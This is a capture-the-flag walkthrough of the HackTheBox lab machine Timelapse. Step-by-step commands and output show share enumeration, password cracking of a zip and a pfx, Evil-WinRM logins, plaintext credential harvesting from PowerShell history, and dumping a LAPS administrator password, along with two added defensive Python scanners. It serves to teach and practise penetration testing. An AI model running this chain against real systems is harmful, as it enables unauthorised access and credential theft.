Timelapse from HackTheBox — Detailed Walkthrough

Showing you all the tools and techniques needed to complete the box.

Pencer
InfoSec Write-ups


Machine Information

Timelapse from HackTheBox

Timelapse is rated as an easy machine on HackTheBox. This Windows box has many ports open but our time is spent mostly on port 445 with SMB and 5986 with WinRM. With SMBClient we find a couple of open shares, from there we retrieve a backup file. After cracking the zip and then the pfx file within it we use Evil-WinRM to get a remote connection. WinPEAS helps us find a file with credentials. Swapping to that new user we dump a LAPS password for the administrator and complete the box.

Skills required are mostly around enumeration of shares and the Windows file system. Skills learned are converting and cracking different file types, using Evil-WinRM and LAPS.

Initial Recon

As always let’s start with Nmap:

Nmap scan of the box

SMBClient

It’s a Windows box with port 445 open, let’s have a look for shares:

┌──(root💀kali)-[~/htb/timelapse]
└─# smbclient -L 10.10.11.152
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share

SMBMap

We can see a non-default share called Shares. Instead of looking around it manually, you can use smbmap to list everything we have access to:

smbmap showing list of accessible files

A backup file is usually a good place to look. Let’s grab that winrm zip file:

┌──(root💀kali)-[~/htb/timelapse]
└─# smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\root's password:
smb: \> cd Dev
smb: \Dev\> dir
winrm_backup.zip A 2611 Mon Oct 25 16:46:42 2021
6367231 blocks of size 4096. 1076764 blocks available

smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip
(0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \Dev\> exit

Unfortunately we find it’s a password protected zip file:

┌──(root💀kali)-[~/htb/timelapse]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
password incorrect--reenter:
password incorrect--reenter:
skipping: legacyy_dev_auth.pfx incorrect password

Zipfile Hash Cracking

Use the zip2john script to create a hash file we can try and crack:

┌──(root💀kali)-[~/htb/timelapse]
└─# zip2john winrm_backup.zip > winrm.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(root💀kali)-[~/htb/timelapse]
└─# cat winrm.hash
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip$1*1*2*0*965*9fb*12ec568
c88a3cec7243acf179b842f2d96414d306fd67f0bb6abd97366b7aaea736a0<SNIP>
82727976b2243d1d9a4032d625b7e40325220b35bae73a3d11f4e82a4085f9<SNIP>
7b7e506452f76*$/pkzip$:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip

Now we can try to crack with JohnTheRipper and the rockyou wordlist:

┌──(root💀kali)-[~/htb/timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt winrm.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:03 DONE (2022-04-09 22:31) 0.2583g/s 897521p/s 897521c/s 897521C/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

It only takes a few seconds to get the password. Let’s unzip the file and look inside:

┌──(root💀kali)-[~/htb/timelapse]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
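
John identified the archive entry as PKZIP, which is the legacy ZipCrypto scheme; that is why a wordlist runs through it at roughly 900k candidates a second. As an added example, not part of the original post or anything from the box, here is a small Python audit that reads a zip's central directory with the standard library and reports whether each entry is unencrypted, ZipCrypto or WinZip AES, so a defender can spot backups that rely on the weak scheme without needing the password. The archives it checks are constructed in memory; the entry names and contents are made up.

```python
"""Classify how each entry in a zip archive is protected (added example).

Legacy ZipCrypto is signalled by general-purpose flag bit 0 together with an
ordinary compression method. WinZip-style AES entries instead use compression
method 99 and carry a 0x9901 extra field naming the key strength. Reading the
central directory is enough to tell them apart. The archives built below are
constructed in memory; names and contents are made up.
"""
import io
import struct
import zipfile
import zlib

AES_METHOD = 99          # compression-method value reserved for WinZip AE-x
AES_EXTRA_ID = 0x9901    # extra-field header ID carrying the AES parameters
AES_STRENGTH = {1: "AES-128", 2: "AES-192", 3: "AES-256"}


def classify_entry(info: zipfile.ZipInfo) -> str:
    """Return 'none', 'zipcrypto' or 'AES-<bits>' for one entry."""
    if not info.flag_bits & 0x1:          # bit 0 clear: entry is not encrypted
        return "none"
    if info.compress_type != AES_METHOD:  # encrypted but not AES: ZipCrypto
        return "zipcrypto"
    pos = 0                               # walk the (id, length, data) extra records
    while pos + 4 <= len(info.extra):
        rec_id, rec_len = struct.unpack_from("<HH", info.extra, pos)
        data = info.extra[pos + 4:pos + 4 + rec_len]
        if rec_id == AES_EXTRA_ID and len(data) >= 7:
            # layout: vendor version (2), vendor id "AE" (2), strength (1), real method (2)
            return AES_STRENGTH.get(data[4], "AES-unknown")
        pos += 4 + rec_len
    return "AES-unknown"


def audit_zip(data: bytes) -> dict:
    """Map every entry name in the archive bytes to its protection class."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: classify_entry(info) for info in zf.infolist()}


def weak_entries(data: bytes) -> list:
    """Names of entries that rely on ZipCrypto and should be treated as exposed."""
    return [name for name, kind in audit_zip(data).items() if kind == "zipcrypto"]


def build_zip(entries) -> bytes:
    """Construct a minimal archive from (name, body, flags, method, extra) tuples.

    Only the headers matter for the audit, so the bodies of the 'encrypted'
    samples are opaque placeholder bytes rather than real ciphertext.
    """
    out, central = io.BytesIO(), []
    for name, body, flags, method, extra in entries:
        name_b, offset = name.encode(), out.tell()
        crc = zlib.crc32(body) & 0xFFFFFFFF
        out.write(struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, 0, 0x21,
                              crc, len(body), len(body), len(name_b), len(extra)))
        out.write(name_b + extra + body)
        central.append(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags,
                                   method, 0, 0x21, crc, len(body), len(body),
                                   len(name_b), len(extra), 0, 0, 0, 0, offset)
                       + name_b + extra)
    cd_offset, cd = out.tell(), b"".join(central)
    out.write(cd)
    out.write(struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, len(entries), len(entries),
                          len(cd), cd_offset, 0))
    return out.getvalue()


# WinZip AE-2 record: vendor version 2, vendor "AE", strength 3 (256-bit), real method 8
AES256_EXTRA = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", 3, 8)

# Constructed sample archive: one plain entry, one ZipCrypto entry, one AES-256 entry.
SAMPLE_ARCHIVE = build_zip([
    ("readme.txt", b"nothing sensitive here", 0x0, 0, b""),
    ("legacy_backup.pfx", b"\x00" * 40, 0x1, 8, b""),
    ("modern_backup.pfx", b"\x00" * 40, 0x1, AES_METHOD, AES256_EXTRA),
])

if __name__ == "__main__":
    for name, kind in audit_zip(SAMPLE_ARCHIVE).items():
        print(f"{name:<20} {kind}")
```

To check a real file, pass its bytes to audit_zip. Any entry reported as zipcrypto is worth treating as if it were stored in the clear: guessing runs at the speed seen above whatever the password looks like, and a backup that holds key material belongs in an AES-protected archive, or better, not on a readable share at all.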

PFX file Hash Cracking

The archive gives us a pfx (PKCS#12) file. If you've not worked with pfx files before, this guide is helpful; its last section explains how to extract a private key from a pfx file. However, when we try it we find this file also needs a password:

┌──(root💀kali)-[~/htb/timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
Enter Import Password:
Mac verify error: invalid password?

Back to John to crack this one. First convert the pfx file to a John friendly hash:

┌──(root💀kali)-[~/htb/timelapse]
└─# pfx2john legacyy_dev_auth.pfx > pfx.hash

┌──(root💀kali)-[~/htb/timelapse]
└─# cat pfx.hash
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a5d
668ba8fe550ae18a$3082099c3082060f06092a864886f70d010701a082060004
8205fc308205f8308205f4060b2a864886f70d010c0a0102a08204fe308<SNIP>
23b99e245b03465a6ce0c974055e6dcc74f0e893:::::legacyy_dev_auth.pfx

Fire up JohnTheRipper with rockyou again:

┌──(root💀kali)-[~/htb/timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:00:42 DONE (2022-04-09 22:45) 0.02346g/s 75826p/s 75826c/s 75826C/s thuglife06..thsco04
Session completed.

Another password falls out in well under a minute. Now that we have it, let's extract the private key:

┌──(root💀kali)-[~/htb/timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

You can set the PEM pass phrase to anything; I used 1234.

We also need the certificate to go with the private key. Use the password John recovered again:

┌──(root💀kali)-[~/htb/timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt
Enter Import Password:

Evil-WinRM As User Legacyy

Now we have all the files needed to connect using Evil-WinRM:

┌──(root💀kali)-[~/htb/timelapse]
└─# evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>

User Flag

With the PEM pass phrase 1234 we set earlier we're now connected. I grabbed the user flag first:

*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\desktop\user.txt
e9fd75b313ffaa4e72f06e32dffc6f96

WinPEAS

Then I used WinPEAS to look for interesting things:

Downloading latest version of winPEAS

We can use our connected session to upload the file:

*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /root/htb/timelapse/winPEAS.bat
Info: Uploading /root/htb/timelapse/winPEAS.bat to C:\Users\legacyy\Documents\winPEAS.bat
Enter PEM pass phrase:
Data: 47688 bytes of 47688 bytes copied
Info: Upload successful!

The bat file runs but the output is a little messy. Even so, looking through we find a number of interesting things:

*Evil-WinRM* PS C:\Users\legacyy\Documents> .\winPEAS.bat

<SNIP>
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd
AdmPwdEnabled REG_DWORD 0x1
[i] Active if "1"

<SNIP>
Checking PS history file
Volume in drive C has no label.
Volume Serial Number is 22CC-AE66
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 6,101,368,832 bytes free

The ConsoleHost_history.txt file contains commands run by the user we are connected as:

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

It's one of the many files to check, as noted on the PayloadsAllTheThings cheat-sheet. From it we have a new user, svc_deploy, and a password. We also see they listed all the users in AD; a quick check shows there are quite a few:

*Evil-WinRM* PS C:\Users\legacyy\Documents> get-aduser -filter * | select samaccountname
Enter PEM pass phrase:

samaccountname
--------------
Administrator
Guest
krbtgt
thecybergeek
payl0ad
legacyy
sinfulz
babywyrm
svc_deploy
TRX
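
The history file is a good example of a secret sitting somewhere nobody thinks to protect. As an added example, not from the original post, here is a small Python scanner a defender can run over ConsoleHost_history.txt to flag plaintext passwords passed to ConvertTo-SecureString, literal account names in PSCredential constructors, and session options that switch off certificate checks (the -SkipCACheck family seen above). Passwords are reported only as a redacted length so the report never re-leaks them. The history text it scans is constructed to mirror the pattern found on the box, with a made-up password.

```python
"""Scan a PSReadLine history file for credential and TLS hygiene problems.

Added example. PSReadLine appends every interactive command to
%APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt,
so a password typed into ConvertTo-SecureString ends up on disk in clear text.
The sample history below is constructed; the password in it is made up.
"""
import os
import re

PATTERNS = {
    # session options that switch off WinRM certificate validation
    "tls_validation_disabled": re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I),
    # a literal password handed to ConvertTo-SecureString -AsPlainText
    "plaintext_password": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1\s+-AsPlainText", re.I),
    # a literal account name in a PSCredential constructor
    "credential_user": re.compile(
        r"PSCredential\s*\(\s*(['\"])(?P<secret>[^'\"]+)\1", re.I),
}

# Default location of the history file for the current user on Windows.
HISTORY_PATH = os.path.join(
    os.environ.get("APPDATA", ""),
    "Microsoft", "Windows", "PowerShell", "PSReadLine", "ConsoleHost_history.txt")

# Constructed sample mirroring the pattern on the box; the password is not real.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano | select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Example#Pass-Not-Real-42' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""


def redact(secret: str) -> str:
    """Report only the length so a finding never re-leaks the password."""
    return f"<redacted {len(secret)} chars>"


def scan_history(text: str) -> list:
    """Return one finding per (line, kind) as dicts with line, kind and detail."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            matches = list(pattern.finditer(line))
            if not matches:
                continue
            if kind == "plaintext_password":
                detail = redact(matches[0].group("secret"))
            elif kind == "credential_user":
                detail = matches[0].group("secret")   # account names are not secret
            else:
                detail = ", ".join(m.group(0) for m in matches)
            findings.append({"line": number, "kind": kind, "detail": detail})
    return findings


def scan_file(path: str = HISTORY_PATH) -> list:
    """Scan a history file on disk; a missing file means nothing to report."""
    if not os.path.exists(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.read())


if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(f"line {finding['line']:>3}  {finding['kind']:<24} {finding['detail']}")
```

On a real host call scan_file() with no arguments to use the default PSReadLine path, or pass the path of a history file collected from another profile. The fix for the finding is the same either way: rotate the exposed account's password, and avoid ever typing it on the command line (Get-Credential prompts for it without writing it to history).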

Evil-WinRM As User SVC_Deploy

I can't do a lot as this user, so let's swap to the svc_deploy account we found:

*Evil-WinRM* PS C:\Users\legacyy\Documents> exit
Enter PEM pass phrase:
Info: Exiting with code 0

┌──(root💀kali)-[~/htb/timelapse]
└─# evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

LAPS

I spent a while looking around with nothing obvious jumping out. Looking back at the WinPEAS output, it found LAPS enabled in the registry. We also saw at the start, on the HelpDesk share, the LAPS installation docs and installer. Then the box name makes sense: TimeLapse!

LAPS manages the local administrator password of each computer, rotating it on a set schedule and storing it in the ms-mcs-admpwd attribute of the computer object in AD. This is a guide to all things LAPS, and I also found this helpful; from it I dumped the LAPS password from AD:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> get-adcomputer -filter * -properties ms-mcs-admpwd | select name,ms-mcs-admpwd

name ms-mcs-admpwd
---- -------------
DC01 1;s(T[,8/k6k8+n1e8Jh+Q@r
DB01
WEB01
DEV01

Checking which server we are on we find it’s DC01:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> hostname
dc01

Root Flag

So we have the local administrator password, and we know we’re on the DC01 box that it relates to. Let’s drop out of this shell, and connect as admin:

┌──(root💀kali)-[~/htb/timelapse]
└─# evil-winrm -i 10.10.11.152 -u Administrator -p '1;s(T[,8/k6k8+n1e8Jh+Q@r' -S

Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Let’s grab the root flag to finish the box:

*Evil-WinRM* PS C:\Users> type trx\desktop\root.txt
3b0e8ff4e0ba0e044abaf52dd07d342d

All done. See you next time.

Twitter — https://twitter.com/pencer_io
Website — https://pencer.io

Originally published at https://pencer.io on August 22, 2022.
